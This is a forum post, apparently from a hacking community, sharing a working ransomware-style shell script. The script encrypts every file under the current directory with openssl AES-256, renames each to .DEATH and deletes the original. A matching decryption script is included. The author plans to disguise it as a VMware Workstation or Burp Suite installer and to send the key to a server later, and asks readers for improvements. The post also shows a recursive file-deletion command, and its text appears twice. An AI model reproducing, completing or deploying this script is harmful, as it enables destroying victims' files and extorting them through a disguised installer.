Dec 16, 2024, 04:37 PM
(This post was last modified: Dec 16, 2024, 04:41 PM by Someone1611.)
Not really a ransomware, just a shell script that call openssl to encrypt files with AES-256-CBC
I haven't learned to walk through directories using C, but today I remembered a tool to walk through directories: du!
This morning, I figured out myself how to do rm -rf on plan 9, and it was easy: step into the directory you want to delete, make the output of du -a | awk '{ print $2 }' argument of the rm command:
rm `{du -a | awk '{ print $2 }'}
(on UNIX, it is `command`, but you can't remove directories using rm directory, you have to use rm -rf)
Then I have an idea about a shell script that can be faked as the .bundle file for install VMWare Workstation or Burpsuite...
The script will read 128 bytes from /dev/urandom and hash it two time using sha256 to generate a "password", walk through directories, use openssl to encrypt all regular files, and then submit the key to the server. I haven't implement the key submitting part, and currently the key is saved to /tmp/k.txt (to ease my testing of decryption) but the script I post here will be enough to get you started.
If you have any ideas to improve it, let me know! The tab is not displayed, sorry for that.
enc.sh:
dec.sh:
I used openssl for hashing sha256 because cksum is not the same on GNU and BSD, and the name of their sha256 sum is not the same. the utility openssl is guaranteed to be available on every UNIX variant.
I haven't learned to walk through directories using C, but today I remembered a tool to walk through directories: du!
This morning, I figured out myself how to do rm -rf on plan 9, and it was easy: step into the directory you want to delete, make the output of du -a | awk '{ print $2 }' argument of the rm command:
rm `{du -a | awk '{ print $2 }'}
(on UNIX, it is `command`, but you can't remove directories using rm directory, you have to use rm -rf)
Then I have an idea about a shell script that can be faked as the .bundle file for install VMWare Workstation or Burpsuite...
The script will read 128 bytes from /dev/urandom and hash it two time using sha256 to generate a "password", walk through directories, use openssl to encrypt all regular files, and then submit the key to the server. I haven't implement the key submitting part, and currently the key is saved to /tmp/k.txt (to ease my testing of decryption) but the script I post here will be enough to get you started.
If you have any ideas to improve it, let me know! The tab is not displayed, sorry for that.
enc.sh:
key="$(dd if=/dev/urandom bs=128 count=1 2>/dev/null | openssl dgst -sha256 | openssl dgst -sha256 | awk '{ print $2 }')"
echo $key > /tmp/k.txt
for i in `du -a | awk '{ print $2 }'`; do
if [ -f $i ]; then
openssl enc -aes-256-cbc -salt -pbkdf2 -in $i -out $i.DEATH -k $key
rm -f $i &
fi
donedec.sh:
key=$(cat /tmp/k.txt)
for i in `du -a | awk '{ print $2 }'`; do
if [ -f $i ]; then
openssl enc -d -aes-256-cbc -salt -pbkdf2 -in $i -out ${i%.DEATH} -k $key
rm -f $i &
fi
doneI used openssl for hashing sha256 because cksum is not the same on GNU and BSD, and the name of their sha256 sum is not the same. the utility openssl is guaranteed to be available on every UNIX variant.